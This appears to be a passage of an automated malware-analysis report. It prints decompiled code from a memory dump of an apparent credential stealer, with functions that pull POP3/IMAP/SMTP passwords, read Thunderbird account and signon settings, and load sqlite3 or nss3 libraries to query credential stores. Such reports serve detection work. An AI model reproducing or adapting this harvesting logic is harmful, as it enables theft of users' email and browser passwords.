		_t123 = E00406BA3( *_t204);
		_t195 = _t201 + 0xf84;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0xf84, _t123);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t202 = _t201 + 0x46c;
                                                                                                                                                                  				if(strcmp(_t202, "POP3_Server") == 0) {
                                                                                                                                                                  					_t117 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0x970;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0x970, _t117);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                                                                                                                                  					_t114 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0x970;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0x970, _t114);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                                                                                                                                  					_t111 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0x970;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0x970, _t111);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                                                                                                                                  					_t108 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0x1084;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0x1084, _t108);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                                                                                                                                  					_t105 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0xb70;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0xb70, _t105);
                                                                                                                                                                  					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                                                                                                                                  					_t102 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0xb70;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0xb70, _t102);
                                                                                                                                                                  					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "NNTP_User_Name") == 0) {
                                                                                                                                                                  					_t99 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0xb70;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0xb70, _t99);
                                                                                                                                                                  					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "SMTP_User_Name") == 0) {
                                                                                                                                                                  					_t96 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                                  					_t195 = _t201 + 0x1284;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0x1284, _t96);
                                                                                                                                                                  					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t58 = strcmp(_t202, "POP3_Password2");
                                                                                                                                                                  				_t214 = _t58;
                                                                                                                                                                  				if(_t58 == 0) {
                                                                                                                                                                  					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t59 = strcmp(_t202, "IMAP_Password2");
                                                                                                                                                                  				_t215 = _t59;
                                                                                                                                                                  				if(_t59 == 0) {
                                                                                                                                                                  					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t60 = strcmp(_t202, "NNTP_Password2");
                                                                                                                                                                  				_t216 = _t60;
                                                                                                                                                                  				if(_t60 == 0) {
                                                                                                                                                                  					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t61 = strcmp(_t202, "SMTP_Password2");
                                                                                                                                                                  				_t217 = _t61;
                                                                                                                                                                  				if(_t61 == 0) {
                                                                                                                                                                  					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0xe70, E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
                                                                                                                                                                  				}
                                                                                                                                                                  				_t63 = strcmp(_t202, "SMTP_Email_Address");
                                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                                  					_t203 = _t201 + 0x460;
                                                                                                                                                                  					E004060DA(0xff, _t201 + 0xe70, E00406BA3( *(_t201 + 0x460)));
                                                                                                                                                                  					_t63 = E004060DA(0xff, _t201 + 0x1584, E00406BA3( *_t203));
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("SMTP_Port");
                                                                                                                                                                  				_t196 = _t201 + 0x46c;
                                                                                                                                                                  				_push(_t196);
                                                                                                                                                                  				L004120B4();
                                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                                  					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
                                                                                                                                                                  					 *(_t201 + 0x168c) = _t63;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("NNTP_Port");
                                                                                                                                                                  				_push(_t196);
                                                                                                                                                                  				L004120B4();
                                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                                  					L35:
                                                                                                                                                                  					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
                                                                                                                                                                  					 *(_t201 + 0xf78) = _t63;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("IMAP_Port");
                                                                                                                                                                  					_push(_t196);
                                                                                                                                                                  					L004120B4();
                                                                                                                                                                  					if(_t63 == 0) {
                                                                                                                                                                  						goto L35;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("POP3_Port");
                                                                                                                                                                  						_push(_t196);
                                                                                                                                                                  						L004120B4();
                                                                                                                                                                  						if(_t63 == 0) {
                                                                                                                                                                  							goto L35;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("SMTP_Secure_Connection");
                                                                                                                                                                  				_push(_t196);
                                                                                                                                                                  				L004120B4();
                                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                                  					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
                                                                                                                                                                  					 *(_t201 + 0x1690) = _t63;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("NNTP_Secure_Connection");
                                                                                                                                                                  				_push(_t196);
                                                                                                                                                                  				L004120B4();
                                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                                  					L41:
                                                                                                                                                                  					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("IMAP_Secure_Connection");
                                                                                                                                                                  					_push(_t196);
                                                                                                                                                                  					L004120B4();
                                                                                                                                                                  					if(_t63 == 0) {
                                                                                                                                                                  						goto L41;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("POP3_Secure_Connection");
                                                                                                                                                                  						_push(_t196);
                                                                                                                                                                  						L004120B4();
                                                                                                                                                                  						if(_t63 == 0) {
                                                                                                                                                                  							goto L41;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}

                                                                                                                                                                  0x00410e8c
                                                                                                                                                                  0x00410e8c
                                                                                                                                                                  0x00410ea5
                                                                                                                                                                  0x00410ead
                                                                                                                                                                  0x00410eb3
                                                                                                                                                                  0x00410eb9
                                                                                                                                                                  0x00410ebf
                                                                                                                                                                  0x00410ebf
                                                                                                                                                                  0x00410ed8
                                                                                                                                                                  0x00410ee0
                                                                                                                                                                  0x00410ee6
                                                                                                                                                                  0x00410eec
                                                                                                                                                                  0x00410ef2
                                                                                                                                                                  0x00410ef2
                                                                                                                                                                  0x00410f0b
                                                                                                                                                                  0x00410f13
                                                                                                                                                                  0x00410f19
                                                                                                                                                                  0x00410f1f
                                                                                                                                                                  0x00410f25
                                                                                                                                                                  0x00410f25
                                                                                                                                                                  0x00410f35
                                                                                                                                                                  0x00410f3a
                                                                                                                                                                  0x00410f3e
                                                                                                                                                                  0x00410f53
                                                                                                                                                                  0x00410f53
                                                                                                                                                                  0x00410f5e
                                                                                                                                                                  0x00410f63
                                                                                                                                                                  0x00410f67
                                                                                                                                                                  0x00410f7c
                                                                                                                                                                  0x00410f7c
                                                                                                                                                                  0x00410f87
                                                                                                                                                                  0x00410f8c
                                                                                                                                                                  0x00410f90
                                                                                                                                                                  0x00410fa5
                                                                                                                                                                  0x00410fa5
                                                                                                                                                                  0x00410fb0
                                                                                                                                                                  0x00410fb5
                                                                                                                                                                  0x00410fb9
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00410fe2
                                                                                                                                                                  0x00410ff6
                                                                                                                                                                  0x00410ffb
                                                                                                                                                                  0x00411002
                                                                                                                                                                  0x0041100b
                                                                                                                                                                  0x0041100d
                                                                                                                                                                  0x00411022
                                                                                                                                                                  0x00411037
                                                                                                                                                                  0x0041103c
                                                                                                                                                                  0x0041103d
                                                                                                                                                                  0x00411042
                                                                                                                                                                  0x00411048
                                                                                                                                                                  0x00411049
                                                                                                                                                                  0x00411052
                                                                                                                                                                  0x00411060
                                                                                                                                                                  0x00411066
                                                                                                                                                                  0x00411066
                                                                                                                                                                  0x0041106c
                                                                                                                                                                  0x00411071
                                                                                                                                                                  0x00411072
                                                                                                                                                                  0x0041107b
                                                                                                                                                                  0x0041109f
                                                                                                                                                                  0x004110ab
                                                                                                                                                                  0x004110b1
                                                                                                                                                                  0x0041107d
                                                                                                                                                                  0x0041107d
                                                                                                                                                                  0x00411082
                                                                                                                                                                  0x00411083
                                                                                                                                                                  0x0041108c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041108e
                                                                                                                                                                  0x0041108e
                                                                                                                                                                  0x00411093
                                                                                                                                                                  0x00411094
                                                                                                                                                                  0x0041109d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041109d
                                                                                                                                                                  0x0041108c
                                                                                                                                                                  0x004110b7
                                                                                                                                                                  0x004110bc
                                                                                                                                                                  0x004110bd
                                                                                                                                                                  0x004110c6
                                                                                                                                                                  0x004110d4
                                                                                                                                                                  0x004110da
                                                                                                                                                                  0x004110da
                                                                                                                                                                  0x004110e0
                                                                                                                                                                  0x004110e5
                                                                                                                                                                  0x004110e6
                                                                                                                                                                  0x004110ef
                                                                                                                                                                  0x00411113
                                                                                                                                                                  0x00411125
                                                                                                                                                                  0x004110f1
                                                                                                                                                                  0x004110f1
                                                                                                                                                                  0x004110f6
                                                                                                                                                                  0x004110f7
                                                                                                                                                                  0x00411100
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00411102
                                                                                                                                                                  0x00411102
                                                                                                                                                                  0x00411107
                                                                                                                                                                  0x00411108
                                                                                                                                                                  0x00411111
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00411111
                                                                                                                                                                  0x00411100
                                                                                                                                                                  0x00411132

Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Similarity
• API ID: strcmp$_stricmp$memcpystrlen
• String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
• API String ID: 1113949926-2499304436
• Opcode ID: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
• Instruction ID: fdd8238c1ffaca80b8f1a937c0ff3988063f93198c4aeb5310ca970d52cdd6dd
• Opcode Fuzzy Hash: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
• Instruction Fuzzy Hash: 8E9160B21097049DE628B632ED02BDB73D8AF4431CF21052FF55AE6182EEBDB991465C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
E0040C9AA(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
	signed int _v8;
	intOrPtr _v12;
	char _v16;
	void _v271;
	char _v272;
	void* __ebx;
	void* __edi;
	int _t64;
	int _t66;
	int _t68;
	int _t69;
	int _t72;
	int _t85;
	void* _t91;
	void* _t132;
	char* _t133;
	char* _t135;
	char* _t137;
	char* _t139;
	intOrPtr _t151;
	int _t153;
	int _t154;
	void* _t155;

	_t132 = __edx;
	_v12 = __ecx;
	_v272 = 0;
	memset( &_v271, 0, 0xff);
	_t133 = "mail.account.account";
	_t64 = strlen(_t133);
	_t148 = _t64;
	_t134 = _a4;
	if(strncmp(_a4, _t133, _t64) != 0) {
		_v8 = _v8 & 0x00000000;
	} else {
		_v8 = E0040C923(_t134,  &_v16, _t148);
	}
	if(_v8 != 0) {
		_push("identities");
		_push(_v8);
		L00412072();
		if(_t91 == 0) {
			_t17 = _t155 + 0x604; // 0x604
			E004060DA(0xff, _t17, _a8);
		}
	}
	_t135 = "mail.server";
	_t66 = strlen(_t135);
	_t149 = _t66;
	_t136 = _a4;
	if(strncmp(_a4, _t135, _t66) != 0) {
                                                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v8 = E0040C8CE(_t149, _t136,  &_v272);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					_t85 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                                                                                                  					_push("username");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					_t154 = _t85;
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t85 == 0) {
                                                                                                                                                                  						_t28 = _t154 + 0x204; // 0x204
                                                                                                                                                                  						_t85 = E004060DA(0xff, _t28, _a8);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("type");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t85 == 0) {
                                                                                                                                                                  						_t31 = _t154 + 0x504; // 0x504
                                                                                                                                                                  						_t85 = E004060DA(0xff, _t31, _a8);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("hostname");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t85 == 0) {
                                                                                                                                                                  						_t34 = _t154 + 0x104; // 0x104
                                                                                                                                                                  						_t85 = E004060DA(0xff, _t34, _a8);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("port");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t85 == 0) {
                                                                                                                                                                  						_t85 = atoi(_a8);
                                                                                                                                                                  						 *(_t154 + 0x804) = _t85;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("useSecAuth");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t85 == 0) {
                                                                                                                                                                  						_push("true");
                                                                                                                                                                  						_push(_a8);
                                                                                                                                                                  						L00412072();
                                                                                                                                                                  						if(_t85 == 0) {
                                                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x808)) = 1;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_t137 = "mail.identity";
                                                                                                                                                                  				_t68 = strlen(_t137);
                                                                                                                                                                  				_t150 = _t68;
                                                                                                                                                                  				_t138 = _a4;
                                                                                                                                                                  				_t69 = strncmp(_a4, _t137, _t68);
                                                                                                                                                                  				if(_t69 != 0) {
                                                                                                                                                                  					_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t69 = E0040C8CE(_t150, _t138,  &_v272);
                                                                                                                                                                  					_v8 = _t69;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					_t69 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
                                                                                                                                                                  					_push("useremail");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					_t153 = _t69;
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t69 == 0) {
                                                                                                                                                                  						_t51 = _t153 + 0x404; // 0x404
                                                                                                                                                                  						_t69 = E004060DA(0xff, _t51, _a8);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("fullname");
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  					L00412072();
                                                                                                                                                                  					if(_t69 == 0) {
                                                                                                                                                                  						_t54 = _t153 + 4; // 0x4
                                                                                                                                                                  						_t69 = E004060DA(0xff, _t54, _a8);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("signon.signonfilename");
                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                  				L00412072();
                                                                                                                                                                  				if(_t69 == 0) {
                                                                                                                                                                  					_t151 = _v12;
                                                                                                                                                                  					_t139 = _t151 + 0x245;
                                                                                                                                                                  					_t152 = _t151 + 0x140;
                                                                                                                                                                  					_t72 = strlen(_t151 + 0x140);
                                                                                                                                                                  					_t60 = strlen(_a8) + 1; // 0x1
                                                                                                                                                                  					if(_t72 + _t60 >= 0x104) {
                                                                                                                                                                  						 *_t139 = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E004062B7(_t139, _t152, _a8);
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}
                                                                                                                                                                  0x0040cbb5
                                                                                                                                                                  0x0040cbba
                                                                                                                                                                  0x0040cbbf
                                                                                                                                                                  0x0040cbc2
                                                                                                                                                                  0x0040cbc4
                                                                                                                                                                  0x0040cbcd
                                                                                                                                                                  0x0040cbd2
                                                                                                                                                                  0x0040cbd8
                                                                                                                                                                  0x0040cbdd
                                                                                                                                                                  0x0040cbde
                                                                                                                                                                  0x0040cbe3
                                                                                                                                                                  0x0040cbe6
                                                                                                                                                                  0x0040cbef
                                                                                                                                                                  0x0040cbf4
                                                                                                                                                                  0x0040cbf7
                                                                                                                                                                  0x0040cbfc
                                                                                                                                                                  0x0040cbef
                                                                                                                                                                  0x0040cbfd
                                                                                                                                                                  0x0040cc02
                                                                                                                                                                  0x0040cc05
                                                                                                                                                                  0x0040cc0e
                                                                                                                                                                  0x0040cc10
                                                                                                                                                                  0x0040cc13
                                                                                                                                                                  0x0040cc19
                                                                                                                                                                  0x0040cc20
                                                                                                                                                                  0x0040cc2f
                                                                                                                                                                  0x0040cc3a
                                                                                                                                                                  0x0040cc4b
                                                                                                                                                                  0x0040cc3c
                                                                                                                                                                  0x0040cc42
                                                                                                                                                                  0x0040cc48
                                                                                                                                                                  0x0040cc3a
                                                                                                                                                                  0x0040cc55

APIs
• memset.MSVCRT ref: 0040C9CF
• strlen.MSVCRT ref: 0040C9DA
• strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C9E7
• _stricmp.MSVCRT(00000000,server), ref: 0040CA24
• _stricmp.MSVCRT(00000000,identities), ref: 0040CA46
• strlen.MSVCRT ref: 0040CA66
• strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040CA73
• _stricmp.MSVCRT(00000000,username,00000000), ref: 0040CABC
• _stricmp.MSVCRT(00000000,type,00000000), ref: 0040CADE
• _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040CB00
• _stricmp.MSVCRT(00000000,port,00000000), ref: 0040CB22
• atoi.MSVCRT ref: 0040CB30
  • Part of subcall function 0040C923: memset.MSVCRT ref: 0040C959
  • Part of subcall function 0040C923: memcpy.MSVCRT ref: 0040C97B
  • Part of subcall function 0040C923: atoi.MSVCRT ref: 0040C98F
• _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040CB44
• _stricmp.MSVCRT(?,true,00000000), ref: 0040CB57
• strlen.MSVCRT ref: 0040CB72
• strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040CB7F
• _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040CBC4
• _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CBE6
• _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CC05
• strlen.MSVCRT ref: 0040CC20
• strlen.MSVCRT ref: 0040CC2A
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
• String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
• API String ID: 736090197-593045482
• Opcode ID: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
• Instruction ID: 863115145772795da6afe78a2776049e9b2399cf567c3eb7605af69a2dd2c254
• Opcode Fuzzy Hash: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
• Instruction Fuzzy Hash: 4F71C432504209FEEB10EB61DD42BDE77A5DF50328F20426BF945B21D1EB7CAE919A4C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040FCBC(intOrPtr* __esi, char* _a4) {
	void _v283;
	char _v284;
	void _v547;
	char _v548;
	struct HINSTANCE__* _t49;
	struct HINSTANCE__* _t50;
	struct HINSTANCE__* _t61;
	void* _t70;
	struct HINSTANCE__* _t74;
	CHAR* _t91;
	intOrPtr* _t93;
	void* _t94;
	void* _t95;
	void* _t96;

	_t93 = __esi;
	// Offset 0x24 of the context block caches the module handle; if it is already set, nothing to do.
	if( *((intOrPtr*)(__esi + 0x24)) != 0) {
		L16:
		return 1;
	}
	_v284 = 0;
	memset( &_v283, 0, 0x117);
	_t95 = _t94 + 0xc;
	if(_a4 == 0) {
		// No directory supplied by the caller: E0040FAA6 fills in a default path.
		E0040FAA6( &_v284);
	} else {
		strcpy( &_v284, _a4);
	}
	if(_v284 == 0) {
		// No path at all: fall back to a process-wide sqlite3.dll, loading it if not already mapped.
		_t91 = "sqlite3.dll";
		_t49 = GetModuleHandleA(_t91);
		 *(_t93 + 0x24) = _t49;
		if(_t49 != 0) {
			goto L14;
		}
		_t61 = LoadLibraryA(_t91);
		goto L13;
	} else {
		// A directory was given: try sqlite3.dll, then mozsqlite3.dll, then nss3.dll beneath it.
		// E00406155 is used as an existence check on each candidate path (returns 0 when absent).
		_v548 = 0;
		memset( &_v547, 0, 0x104);
		strcpy( &_v548,  &_v284);
		strcat( &_v284, "\\sqlite3.dll");
		_t70 = E00406155( &_v284);
		_t96 = _t95 + 0x20;
		if(_t70 == 0) {
			strcpy( &_v284,  &_v548);
			strcat( &_v284, "\\mozsqlite3.dll");
			_t96 = _t96 + 0x10;
		}
		if(E00406155( &_v284) == 0) {
			strcpy( &_v284,  &_v548);
			strcat( &_v284, "\\nss3.dll");
		}
		_t74 = GetModuleHandleA( &_v284);
		 *(_t93 + 0x24) = _t74;
		if(_t74 != 0) {
			L14:
			_t50 =  *(_t93 + 0x24);
			if(_t50 == 0) {
				return 0;
			}
			// Resolve the sqlite3 exports into the function table at offsets 0x0..0x20 of the context block.
			 *_t93 = GetProcAddress(_t50, "sqlite3_open");
			 *((intOrPtr*)(_t93 + 4)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_prepare");
			 *((intOrPtr*)(_t93 + 8)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_step");
			 *((intOrPtr*)(_t93 + 0xc)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_text");
			 *((intOrPtr*)(_t93 + 0x10)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int");
			 *((intOrPtr*)(_t93 + 0x14)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int64");
			 *((intOrPtr*)(_t93 + 0x18)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_finalize");
			 *((intOrPtr*)(_t93 + 0x1c)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_close");
			 *((intOrPtr*)(_t93 + 0x20)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_exec");
			goto L16;
		} else {
			// Flag 8 is LOAD_WITH_ALTERED_SEARCH_PATH, so the DLL's own directory is searched for its dependencies.
			_t61 = LoadLibraryExA( &_v284, 0, 8);
			L13:
			 *(_t93 + 0x24) = _t61;
			goto L14;
		}
	}
}

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040FCE5
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040FCFC
                                                                                                                                                                  • memset.MSVCRT ref: 0040FD29
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD3C
                                                                                                                                                                  • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD73
                                                                                                                                                                  • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDAB
                                                                                                                                                                  • strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
                                                                                                                                                                  • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040FE51
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040FE5E
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040FE85
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$strcpy$strcat$HandleLibraryLoadModulememset
                                                                                                                                                                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                                  • API String ID: 2571629209-2385123308
                                                                                                                                                                  • Opcode ID: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                                                                                                                                                                  • Instruction ID: c8562112cbf9eae777f2394b99ada5fc335e217e34df457794dbf1c8b1b14659
                                                                                                                                                                  • Opcode Fuzzy Hash: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                                                                                                                                                                  • Instruction Fuzzy Hash: 86516371900308AECB30EFA1DD45ECB7BF8AF58704F10497BE649E2641E678E6858F58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E0040D003(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                                                                                                                                  				char* _v8;
                                                                                                                                                                  				char* _v12;
                                                                                                                                                                  				char* _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				int _v40;
                                                                                                                                                                  				char _v60;
